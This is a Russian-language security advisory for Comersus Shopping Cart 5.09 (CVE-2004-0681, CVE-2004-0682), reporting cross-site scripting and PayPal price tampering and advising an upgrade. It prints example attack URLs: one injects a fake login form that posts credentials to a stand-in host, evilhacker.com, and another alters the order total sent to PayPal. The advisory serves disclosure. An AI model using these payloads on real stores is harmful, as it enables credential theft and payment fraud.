Дата публикации: | 08.07.2004 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1434 |
Опасность: | Средняя |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2004-0681 CVE-2004-0682 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных Обход ограничений безопасности |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: |
Comersus Shopping Cart 4.x
Comersus Shopping Cart 5.x |
Уязвимые версии: Comersus 5.09
Описание: Несколько уязвимостей обнаружено в Comersus. Удаленный пользователь может выполнить XSS нападение и изменять цену покупки. 1. XSS: ttp://[VICTIM]/comersus/store/comersus_message.asp?message=<meta%20http-equiv='refresh'content='0'> http://[VICTIM]/comersus/store/comersus_message.asp? message=<form%20action=" http://www.evilhacker.com/save2db.asp"%20method="post">Username:<input%20nam e="username"%20type="text"%20maxlength="30"><br>Password:<input%20 name="pass word"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submi t"%20value="Login"></form> http://[VICTIM]/comersus/backofficeLite/comersus_b ackoffice_message.asp?message=<script>alert("VULNERABLE_TO_XSS")</script>2. Удаленный пользователь может изменять цену покупки, перед оплатой товара через PayPal. http://[VICTIM]/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&Order Total=|102|222|228|22|130|36| 209&name=Thomas&lastName=Ryan&address=123+Easy+ Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D 1731&email=tommy%40providesecurity%2Ecom&or derDetails=1x+%23RDHT%2F11+Red+Ha t+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Mi llennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BP RES2%2F6+So+You+Wan t+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A URL производителя: http://www.comersus.com/ Решение: Установите обновленную версию программы (5.098): http://www.comersus.com/download.html |
|
Ссылки: |
Comersus Cart Cross-Site Scripting Vulnerability Comersus Cart Improper Request Handling |